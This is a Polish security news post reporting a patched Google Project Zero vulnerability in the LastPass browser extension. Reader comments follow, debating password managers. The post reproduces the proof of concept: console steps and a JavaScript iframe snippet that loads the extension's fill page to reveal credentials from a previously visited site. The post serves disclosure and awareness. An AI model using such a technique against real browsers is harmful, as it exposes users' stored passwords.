Managery haseł są dobre. Ich pluginy do przeglądarek mniej. Podatność w LastPass umożliwiająca wykradanie haseł.

17 września 2019, 12:01 | W biegu | komentarzy 5
: zin o bezpieczeństwie - pobierz w pdf/epub/mobi.

Google Project Zero donosi o załatanej już podatności w LastPass (czy raczej przeglądarkowym pluginie dostarczanym przez tego managera haseł). PoC jest dość prosty i umożliwia na wykradzenie hasła wpisywanego na poprzednio odwiedzanej stronie:

1. Go to https://accounts.google.com, when prompted for password click the little „…” icon.
2. Go to https://example.com
3. Enter this in the console:

y = document.createElement(„iframe”);
y.height = 1024;
y.width = „100%”;
y.src=”chrome-extension://hdokiejnpimakedhajhdlcegeplioahd/popupfilltab.html”;
// or y.src=”moz-extension://…”;
// or y.src=”ms-browser-extension://…”;
document.body.appendChild(y);

Notice that the credentials displayed are from the previous site.

Luka jest już załatana, ale warto pamiętać że to właśnie pluginy przeglądarkowe są piętą Achillesową managerów haseł

–ms

 

Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

  1. Morda

    LastPass/Bitwarden to syf. KeePass (którakolwiek wersja) jest znacznie lepszym rozwiązaniem. Jeżeli chcesz mieć bazę haseł zsynchronizowaną z innymi urządzeniami możesz użyć SyncThing, wtedy nic nie trafia do chmury. Jeżeli wolisz jednak użyć rozwiązania chmurowego jak NextCloud, ale (oessuu) GDrive to skorzystaj z BoxCryptora. Tylko pamiętaj keyfile nie uploadujesz NIGDZIE, jeżeli chcesz przerzucić na urządzenie użyj oldschoolowego kabla USB albo folderu dzielonego w ZAUFANEJ sieci. No i NIGDY NIE UŻYWAJ ROZSZERZEŃ DO HASEŁ. Nieważne z którego menadżera korzystasz.

    PS: Wiem że Bitwarden ma możliwość postawienia na własnym serwerze, ale po tym jak główny dev podchodzi do wszelkich luk to nie brałbym nawet tej opcji poważnie.

    POZDRO MORDY

    Odpowiedz
    • Mario

      Jakich rozszerzen ? Masz na mysli dodatkowe pluginy ?

      Odpowiedz
  2. m

    No fajnie, pluginy to zło, to lepiej żeby hasła przechodziły przez schowek? :)

    Odpowiedz
    • Najlepiej to mieć świadomość co się dzieje. W przypadku pluginu też masz „schowek” tylko mają do niego potencjalnie dostęp inne witryny ;-)

      Odpowiedz
      • M

        Troche clickbait. Zapomnieliscie o paru „szczegolach”
        „To exploit this bug, a series of actions would need to be taken by a LastPass user including filling a password with the LastPass icon, then visiting a compromised or malicious site and finally being tricked into clicking on the page several times.”

        Odpowiedz

Odpowiedz